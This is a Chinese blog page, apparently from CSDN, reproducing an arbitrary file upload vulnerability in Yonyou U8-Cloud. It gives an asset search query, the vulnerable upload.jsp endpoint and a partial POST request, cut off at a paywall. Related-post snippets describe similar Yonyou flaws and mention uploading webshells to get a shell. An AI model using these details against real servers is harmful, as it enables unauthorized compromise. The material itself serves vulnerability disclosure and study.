【漏洞复现】用友U8-Cloud 存在任意文件上传漏洞

已于 2023-11-17 21:05:55 修改
阅读量406 收藏
点赞数 3
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 漏洞复现 渗透测试 网络安全 web安全
于 2023-11-17 21:05:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/134470846
版权

漏洞描述

U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件上传漏洞。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

app="用友-U8-Cloud"

漏洞复现

http://127.0.0.1/linux/pages/upload.jsp

POST /linux/pages/upload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application
了解本专栏 订阅专栏 解锁全文 超级会员免费看
丢了少年失了心1
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友GRP-U8 ReturnForWcp RCE漏洞复现
0xSec
11-16 1128
用友GRP-U8内控管理软件/servlet/PayReturnForWcp接口处存在xxe漏洞,攻击者可利用xxe漏洞组合内部axis组件的AdminService部署恶意类service,使用外部实体%name来加载"http://xxxx/services/AdminService?method=xx" 远程URL,调用javax.elELProcessor,部署成功后可写入恶意后门文件,可导致服务器失陷。
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2538
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
漏洞复现用友U8 Cloud upload任意文件上传漏洞
qq_34780861的博客
04-02 218
用友U8 cloud前台任意文件上传导致远程命令执行漏洞。未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
用友U8-cloud_base64接口存在漏洞
最新发布
m0_46604997的博客
04-03 460
U8 cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案,全面支持多组织业务协同、营销创新、智能财务、人力服务,构建产业链制造平台,融合用友云服务,实现企业互联网资源连接、共享、协同,赋能中国成长型企业高速发展、云化创新。U8 cloud base64 接口处存在SQL注入漏洞。攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露,更严重的是数据库服务器控制有很大风险被攻击者控制等相关安全问题。
用友GRP-U8 任意文件上传漏洞
weixin_44304678的博客
11-02 615
用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友U8+ CRM目录遍历漏洞复现
m0_69931798的博客
10-18 270
或者将补丁压缩包中updateApConf.cmd放到U8SOFT\turbocrm70\apache\conf目录下执行,执行完之后在u8应用管理中重启apache服务。可以修改配置文件,即修改apache配置,将Options Indexes FollowSymLinks修改为Options FollowSymLinks,不在允许列出目录。漏洞影响U8 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本。用友U8+CRM存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞远程攻击...
用友u8-ERP应用流程.doc
11-03
用友u8-ERP应用流程
用友U8-OA标准方案.docx
05-26
用友U8-OA标准方案
用友U8-V13财务及供应链操作手册.pdf
01-06
用友 U8+V13 财务及供应链操作手册 (总账报表 固定资产 应收/应付款管理 采购 销售 库存 存货核算)
用友U8 cloud V1.0-自定义技术红皮书.pdf
02-16
用友U8 cloud V1.0-自定义技术红皮书
用友U8 CRM客户关系管理任意文件上传漏洞复现【附POC】
薛定谔嘚喵博客
09-27 266
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。 用友U8 crm客户关系管理 ajax/getemaildata.php任意文件上传漏洞
用友NC-Cloud uploadChunk 任意文件上传漏洞
CommputerMac的博客
10-17 969
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
Goby 漏洞更新|用友GRP-U8 软件 U8AppProxy 任意文件上传漏洞
m0_46699477的博客
06-08 978
用友GRP-U8管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-U8管理软件 U8AppProxy 存在任意文件上传漏洞,攻击者可上传webshell获取服务器权限。
漏洞复现--用友U8-Cloud upload.jsp任意文件上传
qq_53003652的博客
10-26 547
U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞。上传路径在/linux/{filename}.jsp。此处为国外网站资产,请勿非法利用!上传免杀马直接getshell。用友U8-Cloud
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1788
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友GRP-U8 SQL注入漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1561
用友GRP-U8 SQL注入漏洞复现
用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
0xSec
03-21 5274
用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE)漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据传递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实现远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实现远程命令执行。 当然,为了成功复现这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在复现过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修复和加强系统安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值